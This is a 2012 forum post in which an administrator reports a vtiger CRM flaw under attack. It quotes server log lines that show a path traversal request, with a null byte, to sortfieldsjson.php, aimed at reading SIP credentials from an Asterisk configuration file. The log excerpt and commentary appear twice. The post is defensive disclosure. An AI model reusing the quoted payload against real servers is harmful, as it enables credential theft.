Vtiger flaw thats being attacked
Posted: Mon Jul 16, 2012 3:29 pm
Saw a couple of these in some logs today. I searched on the forum for vtiger and security but didnt find a complaint. Not sure if this has been reported yet:
access_log:188.161.240.5 - - [16/Jul/2012:12:34:17 -0700] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/asterisk/sip-vicidial.conf%00 HTTP/1.1" 200 92724 "-" "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1"
error_log:[Mon Jul 16 06:26:53 2012] [error] [client 188.161.240.5] PHP Fatal error: Class '../../../../../../../..//etc/asterisk/sip-vicidial.conf' not found in /srv/www/htdocs/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php on line 13
error_log:[Mon Jul 16 11:53:33 2012] [error] [client 188.161.240.5] PHP Fatal error: Class '../../../../../../../..//etc/asterisk/sip-vicidial.conf' not found in /srv/www/htdocs/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php on line 13
error_log:[Mon Jul 16 12:34:19 2012] [error] [client 188.161.240.5] PHP Fatal error: Class '../../../../../../../..//etc/asterisk/sip-vicidial.conf' not found in /srv/www/htdocs/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php on line 13
They are trying to get sip credentials from the file.
access_log:188.161.240.5 - - [16/Jul/2012:12:34:17 -0700] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/asterisk/sip-vicidial.conf%00 HTTP/1.1" 200 92724 "-" "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1"
error_log:[Mon Jul 16 06:26:53 2012] [error] [client 188.161.240.5] PHP Fatal error: Class '../../../../../../../..//etc/asterisk/sip-vicidial.conf' not found in /srv/www/htdocs/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php on line 13
error_log:[Mon Jul 16 11:53:33 2012] [error] [client 188.161.240.5] PHP Fatal error: Class '../../../../../../../..//etc/asterisk/sip-vicidial.conf' not found in /srv/www/htdocs/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php on line 13
error_log:[Mon Jul 16 12:34:19 2012] [error] [client 188.161.240.5] PHP Fatal error: Class '../../../../../../../..//etc/asterisk/sip-vicidial.conf' not found in /srv/www/htdocs/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php on line 13
They are trying to get sip credentials from the file.